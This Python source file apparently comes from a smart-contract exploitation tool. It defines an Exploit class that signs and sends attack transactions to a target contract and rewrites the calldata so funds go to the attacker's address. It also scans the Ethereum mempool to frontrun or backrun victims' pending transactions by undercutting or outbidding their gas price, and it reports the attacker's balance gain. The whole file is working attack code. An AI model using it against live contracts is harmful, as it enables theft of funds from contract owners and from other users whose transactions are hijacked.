import logging
import re
import time

from web3 import Web3


class Exploit:
    """A list of transaction templates that attack a single target contract.

    Each template in ``txs`` is expected to expose ``data`` (presumably a hex
    calldata string) and ``value`` attributes. Occurrences of the placeholder
    address ``deadbeef...deadbeef`` in ``data`` are replaced with the attacking
    account's address before a transaction is signed and sent.
    """

    # 20-byte placeholder address used in transaction templates; substituted
    # with the attacking account's address (without the "0x" prefix).
    _ADDRESS_PLACEHOLDER = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"

    def __init__(
        self,
        txs: list,
        w3: Web3,
        contract: str,
        account: str,
        account_pk: str,
        title: str = None,
        description: str = None,
        swc_id: int = 0,
        verbosity: int = logging.INFO,
    ):
        """Configure the exploit.

        Args:
            txs: Transaction templates (objects with ``data`` and ``value``).
            w3: Web3 instance (can be HTTP, WebSockets, IPC).
            contract: Address of the contract to attack (checksummed here).
            account: Address that sends the transactions (checksummed here).
            account_pk: Private key of ``account``, used to sign transactions.
            title: Optional title, shown by ``repr``.
            description: Optional description, shown by ``repr``.
            swc_id: SWC ID shown by ``repr``; defaults to 0.
            verbosity: Logging level applied to the "Exploit" logger.
        """
        # Web3 instance (can be HTTP, WebSockets, IPC)
        self.w3 = w3
        # Meta information
        self.title = title
        self.description = description
        self.swc_id = swc_id
        # Transaction list
        self.txs = txs

        # Contract to attack
        self.contract = Web3.toChecksumAddress(contract)
        # Account to send transactions from
        self.account = Web3.toChecksumAddress(account)
        # Account's private key
        self.account_private_key = account_pk

        # Gas price (in wei) when executing exploit: 10 gwei
        self.gas_price = 10 ** 10
        # Gas price increment when frontrunning
        self.gas_price_increment = 1
        # Gas value when `gas_estimate` is False
        self.gas = 200000
        # Gas increment when frontrunning
        self.gas_increment = 1
        # Estimate gas when sending transactions
        self.gas_estimate = True

        # Sleep in seconds when scanning mem pool
        self.sleep = 1

        # Wait for transactions to be mined
        self.wait = True

        # Logging. The logger's own level must be set as well: otherwise it
        # inherits the root level (WARNING by default) and every info/debug
        # message is discarded before it ever reaches the handler.
        self.logger = logging.getLogger("Exploit")
        self.logger.setLevel(verbosity)
        if not self.logger.hasHandlers():
            logger_stream = logging.StreamHandler()
            logger_stream.setLevel(verbosity)
            logger_stream.setFormatter(
                logging.Formatter("%(asctime)s - %(message)s")
            )
            self.logger.addHandler(logger_stream)

    def __repr__(self):
        return """Exploit: {title}
Description: {description}
SWC ID: {swc_id}
Transaction list: {txs}""".format(
            title=self.title,
            description=self.description,
            swc_id=self.swc_id,
            txs=self.txs,
        )

    def _substitute_addresses(self, data, victim_address=None):
        """Return ``data`` with placeholder/victim addresses replaced by ours.

        The placeholder is replaced verbatim. ``victim_address`` (``0x``-prefixed,
        possibly checksummed) is matched case-insensitively against its bare
        hex form, because calldata embeds addresses without the ``0x`` prefix
        and in arbitrary case.
        """
        account_hex = self.account[2:]
        data = data.replace(self._ADDRESS_PLACEHOLDER, account_hex)

        victim_hex = victim_address[2:] if victim_address else ""
        # Guard against an empty pattern, which would match between every char.
        if victim_hex:
            data = re.sub(
                re.escape(victim_hex), account_hex, data, flags=re.IGNORECASE
            )
        return data

    def execute(self, nonce=None):
        """Sign and send every transaction in ``self.txs`` to the contract.

        Args:
            nonce: Nonce for the first transaction; defaults to the account's
                current transaction count. Later transactions use consecutive
                nonces.

        Returns:
            One entry per transaction, as returned by ``send_tx`` (the receipt
            when ``self.wait`` is True, otherwise None).
        """
        if nonce is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)
        else:
            nonce_index = nonce

        initial_balance = self.w3.eth.getBalance(self.account)

        receipts = []
        for tx in self.txs:
            run_tx = {
                "from": self.account,
                "to": self.contract,
                "gasPrice": self.gas_price,
                "gas": self.gas,
                "value": tx.value,
                "data": self._substitute_addresses(tx.data),
                "nonce": nonce_index,
            }
            nonce_index += 1

            # Estimate gas
            if self.gas_estimate is True:
                self.logger.debug("Estimating gas for tx: {tx}".format(tx=run_tx))
                run_tx["gas"] = self.w3.eth.estimateGas(run_tx)

            receipts.append(self.send_tx(run_tx))

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

        self.logger.debug(receipts)
        return receipts

    def _front_back_run(
        self, flush=False, nonce_index=None, wait_txs=None, send_txs=None, run_type=None
    ):
        """Wait for each transaction in ``wait_txs`` and answer it.

        For the i-th awaited transaction seen in the mem pool, the i-th
        template in ``send_txs`` is sent with a gas price one increment above
        (``"frontrun"``) or below (``"backrun"``) the victim's.

        Args:
            flush: Ignore pending transactions already seen when each filter
                is created.
            nonce_index: Nonce for the first transaction sent; defaults to the
                account's current transaction count.
            wait_txs: Templates to wait for; defaults to ``self.txs``.
            send_txs: Templates to send; defaults to ``self.txs``. Must have the
                same length as ``wait_txs``.
            run_type: ``"frontrun"`` or ``"backrun"``.
        """
        if run_type not in ("frontrun", "backrun"):
            self.logger.error(
                "Must specify if it should frontrun or backrun transactions."
            )
            return

        self.logger.info("Scanning the mem pool for transactions...")

        if nonce_index is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)

        initial_balance = self.w3.eth.getBalance(self.account)

        # If we don't specify a different set of transactions to wait for, use the ones in the exploit
        if wait_txs is None:
            wait_txs = self.txs

        # If we don't specify a different set of transactions to send, use the ones in the exploit
        if send_txs is None:
            send_txs = self.txs

        if len(wait_txs) != len(send_txs):
            self.logger.error(
                "The number of transactions we're waiting for needs to match the number of transactions to send. {wait_len} != {send_len}".format(
                    wait_len=len(wait_txs), send_len=len(send_txs)
                )
            )
            return

        # Wait for each tx and answer it with the matching template.
        for wait_tx, template in zip(wait_txs, send_txs):
            self.logger.info("Waiting for tx: {tx}".format(tx=wait_tx))

            victim_tx = self.wait_for(self.contract, wait_tx, flush=flush)
            self.logger.info(
                "Found tx: {hash}".format(hash=victim_tx.get("hash").hex())
            )

            if run_type == "frontrun":
                gas_price = victim_tx["gasPrice"] + self.gas_price_increment
            else:
                # A gas price cannot be negative.
                gas_price = max(0, victim_tx["gasPrice"] - self.gas_price_increment)

            run_tx = {
                "from": self.account,
                "to": self.contract,
                "data": self._substitute_addresses(template.data, victim_tx["from"]),
                "gas": victim_tx["gas"] + self.gas_increment,
                "gasPrice": hex(gas_price),
                "value": template.value,
                "nonce": nonce_index,
            }

            if self.gas_estimate is True:
                # Keep the try limited to estimation so send failures are not
                # reported as estimation failures.
                try:
                    run_tx["gas"] = self.w3.eth.estimateGas(run_tx) + self.gas_increment
                except ValueError:
                    self.logger.error("Could not estimate gas.")
                    # Nothing is sent, so the nonce is not consumed; using it
                    # up anyway would leave a gap that stalls later txs.
                    continue
                except Exception as e:
                    self.logger.error("Exception caught: {}".format(e))
                    continue

                # NOTE(review): the nonce is treated as consumed once the tx is
                # handed to send_tx, even if sending subsequently fails.
                nonce_index += 1
                try:
                    self.send_tx(run_tx)
                except Exception as e:
                    # Best-effort: keep processing the remaining transactions.
                    self.logger.error("Exception caught: {}".format(e))
            else:
                nonce_index += 1
                self.send_tx(run_tx)

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

    def frontrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        """Send each template with a gas price just above the awaited victim tx."""
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="frontrun",
        )

    def backrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        """Send each template with a gas price just below the awaited victim tx."""
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="backrun",
        )

    def send_tx(self, tx: dict):
        """Sign ``tx`` with the account's key and broadcast it.

        ``tx["to"]`` is checksummed in place before signing.

        Returns:
            The transaction receipt when ``self.wait`` is True (waits up to
            300 seconds for it to be mined), otherwise None.
        """
        # Make sure the addresses are checksummed.
        tx["to"] = Web3.toChecksumAddress(tx["to"])

        signed_tx = self.w3.eth.account.signTransaction(tx, self.account_private_key)
        self.logger.info("Sending tx: {tx}".format(tx=tx))
        tx_hash = self.w3.eth.sendRawTransaction(signed_tx.rawTransaction)
        if self.wait is not True:
            return None

        self.logger.info(
            "Waiting for {tx_hash} to be mined...".format(tx_hash=tx_hash.hex())
        )
        tx_receipt = self.w3.eth.waitForTransactionReceipt(tx_hash, timeout=300)
        self.logger.info("Mined")
        self.logger.debug("Receipt: {}".format(tx_receipt))
        return tx_receipt

    def wait_for(self, contract, tx, flush=False):
        """Block until a pending tx to ``contract`` matching ``tx`` is seen.

        A pending transaction matches when its ``to`` equals ``contract`` and
        its ``input`` equals ``tx.data`` (both compared case-insensitively),
        and its ``value`` equals ``tx.value``. Polls every ``self.sleep``
        seconds, with no timeout.

        Args:
            contract: Address the victim transaction is sent to.
            tx: Template with ``data`` and ``value`` attributes.
            flush: Discard the entries already reported by the new filter
                before polling starts.

        Returns:
            The matching pending transaction as returned by ``getTransaction``.
        """
        # Setting up filter
        pending_filter = self.w3.eth.filter("pending")
        try:
            # Ignore existing transactions and wait for new ones
            if flush is True:
                flushed = pending_filter.get_new_entries()
                self.logger.debug(
                    "Flushing {} existing transactions.".format(len(flushed))
                )

            contract_lower = contract.lower()
            data_lower = tx.data.lower()

            while True:
                time.sleep(self.sleep)
                pending_txs_hashes = pending_filter.get_new_entries()
                self.logger.debug(
                    "Processing {} transactions.".format(len(pending_txs_hashes))
                )
                for tx_hash in pending_txs_hashes:
                    pending_tx = self.w3.eth.getTransaction(tx_hash)

                    # Skip some uninteresting transactions
                    if pending_tx is None or pending_tx.get("to") is None:
                        continue

                    # Skip transactions already mined
                    if pending_tx.get("blockNumber") is not None:
                        continue

                    if (
                        pending_tx["to"].lower() == contract_lower
                        and pending_tx.get("input", "").lower() == data_lower
                        and pending_tx.get("value", 0) == tx.value
                    ):
                        self.logger.debug(
                            "Found pending tx: {tx} from: {sender}.".format(
                                tx=pending_tx.get("hash", b"0").hex(),
                                sender=pending_tx.get("from"),
                            )
                        )
                        return pending_tx
        finally:
            # Each call installs a fresh node-side filter; remove it so
            # repeated waits do not accumulate filters on the node.
            try:
                self.w3.eth.uninstallFilter(pending_filter.filter_id)
            except Exception as e:
                self.logger.debug("Could not uninstall pending filter: {}".format(e))

    def dump_to_file(self, file=None):
        """Serialize the transaction templates' attributes via ``theo.dump``."""
        from theo import dump

        exploit_object = [tx.__dict__ for tx in self.txs]

        dump(ob=[exploit_object], filename=file)
